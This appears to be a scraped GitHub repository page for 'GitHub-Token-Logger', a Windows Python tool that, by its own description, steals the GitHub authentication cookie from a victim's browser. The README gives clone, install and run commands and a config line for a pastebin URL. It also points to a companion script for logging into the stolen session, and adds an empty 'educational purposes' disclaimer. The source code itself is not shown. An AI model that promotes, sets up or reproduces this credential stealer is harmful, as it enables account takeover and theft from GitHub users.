Skip to content

This script is made in python3, and steals the auth cookie that GitHub uses. You can use this cookie to log in to the account, using another script linked in the readme.

Notifications You must be signed in to change notification settings

simplifies/GitHub-Token-Logger

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

12 Commits
 
 
 
 
 
 

Repository files navigation

GitHub-Token-Logger

This script is made in python3, and steals the auth cookie that github uses. You can use this cookie to login to the account, using another script linked in the readme. I have created a script that allows you to login to the cookie. Link: https://github.com/LocalsGitHub/Github-Token-Login

Setup

Depending on your python installation your commands may vary. Below are the commands needed to set up. The script was tested in python 3.8.6, on windows 10. This script only works on windows.

Windows:

git clone https://github.com/LocalsGitHub/GitHub-Token-Logger.git
cd GitHub-Token-Logger
pip install browser_cookie3
pip install requests
py logger.py

Config

Once you have opened the script in your desired text editor, there 1 line that you can change.

# Enter your pastebin below
pastebinURL = "https://pastebin.com/raw/xxxxxx"

Support

Create an issue, or message me on discord.

Credit

Credit to me for maintaining this project. Credit to https://github.com/borisbabic/browser_cookie3 for their module.

This is only for educational purposes, as I am not responsible for any malicous actions you do using this repo.

About

This script is made in python3, and steals the auth cookie that GitHub uses. You can use this cookie to log in to the account, using another script linked in the readme.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages